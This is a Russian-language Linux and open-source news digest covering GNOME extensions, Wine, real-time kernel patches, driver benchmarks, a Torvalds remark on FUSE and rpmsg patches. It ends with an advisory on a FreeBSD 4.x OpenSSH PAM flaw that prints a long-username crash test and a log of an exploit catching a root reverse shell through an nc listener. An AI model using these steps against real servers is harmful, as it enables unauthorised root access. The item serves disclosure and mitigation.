Проект GNOME анонсировал начало тестирования нового ресурса extensions.gnome.org, на котором ведётся работа по формированию каталога дополнений к оболочке GNOME Shell. Используя представленные в каталоге дополнения, пользователи могут изменить и дополнить базовое пользовательское окружение GNOME 3.

Установка дополнений производится непосредственно с сайта в один клик, но для этого требуется установка специального плагина для web-браузера. Дополнения разрабатываются на языке JavaScript с использованием CSS-стилей, что решает проблему с переносимостью между разными платформами.

>>> Подробности (gnome.org)

Доступен для загрузки очередной экспериментальный релиз Wine. Изменения, которые приносит этот выпуск:

• различные улучшения встроенного Internet Explorer;
• поддержка Get/SetDIBits движком DIB;
• в просмотровщике реализована поддержка расширенных метафайлов;
• большое количество улучшений в WinHTTP;
• значительное число исправлений в COM stubless marshaller;
• улучшен механизм регистрации DLL;
• исправлены ошибки.

>>> Подробности (winehq.org)

Томас Глейкснер (Thomas Gleixner), основной разработчик и мейнтейнер RT-ветки ядра Linux, сообщил о выпуске третьей верcии набора патчей с реализацией режима реального времени (Realtime-Preempt", PREEMPT_RT или "-rt") для ядра Linux 3.0. Ядро "-rt" с реализацией жёсткого режима реального времени используется в real-time редакциях промышленных Linux дистрибутивов MontaVista, Red Hat и Novell. Это первое крупное обновление RT-Linux за последние несколько лет, знаменующее уход от ядра версии 2.6.33, которое использовалось в качестве базы для RT-ветки несколько лет подряд.

В письме, отправленном в список рассылки Linux-ядра, Томас Глейкснер отмечает существенное отличие новой версии патчей от предыдущих. Логика работы многих подсистем была кардинально переработана, код стал намного чище и проще для анализа, общий размер патчей сократился более чем в два раза. Теперь код затрагивает гораздо меньше подсистем и структур данных ядра, что, по мнению автора, позволит ускорить процесс его включения в основную ветку. 223 подготовленных в рамках проекта патча, затрагивающих 374 файла разбиты на 4 группы, из которых одна группа устраняет недоработки уже находящихся в ядре подсистем, одна группа уже отправлена для включения в состав основного ядра, одна признана готовой для отправки заявки на включение в состав ядра и одна требует доработки и проверки. Для сравнения, для ветки 2.6.33 было подготовлено 462 патча, затрагивающих 690 файлов.

Ядро с наложенными патчами было протестировано на платформах x86 и x86_64, а также на ARM, MIPS и PowerPC и, по словам Thomas Gleixner оказалось «удивительно стабильным» (amazinlgy stable). Событие знаменательно тем, что это первый случай когда RT-патчи адаптированы для последней актуальной версии Linux-ядра, ранее выпуск патчей существенно отставал, что было связано с большой трудоёмкостью процесса портирования и тестирования.

>>> Подробности (lkml.org)

Ресурс Phoronix представил результаты оценки производительности современного состояния открытого Gallium3D-драйвера для видеокарт AMD/ATI из состава пакета Mesa, в сравнении с проприетарным драйвером AMD Catalyst. В тестах отмечается значительный прогресс, скорость Gallium3D-драйвера в среднем теперь отстает от Catalyst на 60-70% (в тесте Urban Terror на 80%). Для сравнения, в проведенных в начале года тестах Gallium3D-драйвер отставал в 4-5 раз.

Тестирование производилось на системах с видеокартами Radeon HD 6570, Radeon HD 6870 и Radeon HD 6950. В тесте на базе игры Nexuiz отставание Gallium3D-драйвера составило 46%, 69% и 61%. В тесте OpenArena - 50-60%, World of Padman - 70%, Urban Terror - 80%. Отдельный интерес представляет собой тест VDrift, при его выполнении открытый Gallium3D-драйвер заметно обогнал проприетарного конкурента.

Кроме того, отмечается решение проблем со стабильностью: в связке из последнего тестового выпуска Linux-ядра 3.0, Mesa 7.12-devel и xf86-video-ati, больше не отмечаются ранее наблюдаемые крахи и зацикливания. При проведении теста на базе последних экспериментальных версий Linux-ядра 3.0, Mesa 7.12-devel и xf86-video-ati разрыв в производительности между Gallium3D-драйвером и Catalyst уменьшился до 50-60%.

Результаты

>>> Подробности (phoronix.com)

Компания NVIDIA представила релиз проприетарного видеодрайвера NVIDIA 275.19, который пришел на смену стабильной версии 275.09.07.

Из внесенных изменений можно отметить:

• Добавлена поддержка GPU GeForce GT 540M;
• Исправлены ошибки в реализации VDPAU, приводящие к краху Adobe Flash при переходе или возврате из полноэкранного режима;
• В X-драйвере налажена корректная работа в ситуации нехватки системе памяти;
• Устранен дефицит обработки прерываний, который мог привести к проблемам с производительностью и стабильностью при наличии нескольких NVIDIA GPU, использующих одни и теже IRQ;
• Устранены проявляющиеся с glibc ошибки работы с памятью при выполнении приложения FieldView из Intelligent Light;
• Исправлена ошибка драйвера OpenGL, приводящая к краху приложения при запуске Altair HyperMesh;
• Устранена проблема с производительностью, проявляющаяся в приложении Smoke при переключении между стерео и моноскопическим режимами рендеринга.

>>> Подробности (nvnews.net)

«Люди, которые думают, что файловые системы пространства пользователя могут быть чем-то большим, чем игрушки, просто введены в заблуждение» - так Линус Торвальдс прокомментировал сообщение Эндрю Мортона о том, что проблемы производительности файловых систем, основанных на FUSE, нельзя решить только за счет перемещения их кода в ядро. «Fuse подходит тогда, когда речь идет о редко используемом интерфейсе к изначально низкоскоростному устройству. Но для чего-то вроде корневой ФС ? Нет. Из этого ничего не выйдет.» - добавил Линус.

Спор о файловых системах пространства пользователя начался после того, как Миклош Жереди (Miklos Szeredi) отправил в список рассылки linux-fsdevel письмо с просьбой добавить код драйвера OverlayFS в Linux-ядро версии 3.1. Эндрю Мортон (Andrew Morton) спросил его о причинах реализации ФС в виде драйвера ядра, вместо использования FUSE, на что Миклос ответил, что по его мнению, реализация ФС в пространстве пользователя никогда не будет такой же быстрой как ФС пространства ядра. Мортон принял этот аргумент, но в ходе дальнейшей дискуссии добавил, что если ФС, основанная на FUSE имеет низкий уровень производительности, то сначала стоит задуматься о ее правильной реализации, а лишь затем о переносе кода в пространство ядра. После этого в дискуссию вступил Торвальдс.

Громкое заявление Торвальдса вызвало большой резонанс не только в среде пользователей, но и программистов, использующих FUSE. Так, разработчики файловых систем CloudFS и GlusterFS независимо друг от друга опубликовали в своих блогах сообщения о том, что взгляд Линуса Торвальдса на файловые системы слишком ограничен, так как существует масса самых разнообразных применений механизма FUSE, где выгода от простоты и гибкости разработки с его использованием перевешивает любые преимущества пространства ядра в плане производительности. «Что плохого в том, что FUSE делает разработку файловых систем такой же простой как создание игрушек? - написал Джон Марк (John Mark) в конце своего сообщения.

Тем не менее, попытка сторонников FUSE привести драйвер NTFS-3G в качестве примера возможности создания высокопроизводительных FUSE-драйверов была опровергнута одним из разработчиков NTFS-драйвера для Linux, который указал на то, что выполненная той же компанией реализация NTFS в виде модуля ядра значительно превосходит по производительности NTFS-3G.

>>> Главная ссылка к новости (h-online.com)

Охад Бэн-Коэн (Ohad Ben-Cohen), разработчик Linux и создатель самообучаемой HIDS Korset, опубликовал в списке рассылки ядра Linux набор патчей, реализующих универсальный механизм управления работой специализированных микропроцессоров, выполняющих вспомогательные роли на современных системах на кристалле (SoC). Обычно такие процессоры управляются с помощью специализированной ОС реального времени и выполняют такую работу как цифровая обработка сигналов, ускорение обработки мультимедиа-данных или управления разными видами сенсоров, требующих немедленной реакции системы, а для их связи с центральным процессором используются специфические механизмы, разработанные производителем чипа и накладывающие ряд ограничений на программистов.

Патч, реализованный Охадом Бэн-Коэном и двумя другими программистами, фактически устраняет эти ограничения благодаря основанному на технологии VirtIO универсальному механизму обмена сообщениями между центральным процессором и остальными процессорами чипа. Протокол, получивший имя rpmsg, позволил реализовать такие возможности как OMX offloading, менеджер ресурсов и дисплейный драйвер для Netra (dm8168), который работает в ядре Linux, посылая управляющие команды микропроцессору M3 (чип TI OMAP4). Также патч включает в себя реализацию механизма remotproc, позволяющего управлять работой выбранного процессора: останавливать, перезапускать или загружать альтернативные прошивки.

В настоящее время полная поддержка технологии (включая открытый firmware) реализована для чипа TI OMAP4, используемого в популярной платформе PandaBoard (также тестировались Davinci da850-evm и hawkboard).

>>> Новость на opennet (opennet.ru)

В списке рассылки full-disclosure представлена критическая уязвимость в используемой во FreeBSD 4.x версии OpenSSH, позволяющая удаленному злоумышленнику без аутентификации получить root-доступ к системе. Уже создан и публично опубликован эксплоит, позволяющий получить привилегированный shell на подверженных уязвимости серверах.

Уязвимость проявляется для протоколов SSH1 и SSH2. Проблема вызвана ошибкой в реализации аутентификации с использованием PAM на платформе FreeBSD. Проблема присутствует в функции «pam_thread()» из файла auth2-pam-freebsd.c. Начиная с версии FreeBSD 5.2 содержащий уязвимость файл auth2-pam-freebsd.c был заменен новой реализацией, т.е. с большой долей вероятности можно утверждать, что новые версии FreeBSD проблеме не подвержены. 100% уверенности пока нет, так как точно не ясно, не перекочевал ли проблемный код в какие-либо библиотеки PAM или сторонние реализации OpenSSH, используемые и поныне. Детальный аудит ещё предстоит провести.

Ошибка проявляется при передаче слишком длинного имени пользователя. Простой способ проверить наличие уязвимости - попытаться обратиться к своему серверу, указав логин порядка 100 символов. Например:

 #ssh -l`perl -e 'print "A" x 100'` хост 

   $ ./ssh -1 192.168.1.1
   $ nc -v -l -p 10000
   listening on [any] 10000 ...
   192.168.1.1: inverse host lookup failed: Unknown host
   connect to [192.168.1.1] from (UNKNOWN) [192.168.1.2] 1038
   
   uname -a
   
   FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005  /GENERIC  i386

   id

   uid=0(root) gid=0(wheel) groups=0(wheel)

Поддержка ветки FreeBSD 4.x прекращена ещё в 2007 году, но данная версия все еще используется на некоторых серверах в сети. Пользователям версии FreeBSD 4.x рекомендуется срочно обновить OpenSSH до более новой версии. В качестве обходного пути решения проблемы следует разрешить через пакетный фильтр доступ по SSH только для доверительных хостов и отключить поддержку PAM, указав в настройках «ChallengeResponseAuthentication no». Информации о возможности поражения других операционных систем, использующих устаревшие версии OpenSSH с реализацией поддержки PAM от проекта FreeBSD, пока нет.

>>> Opennet.ru (opennet.ru)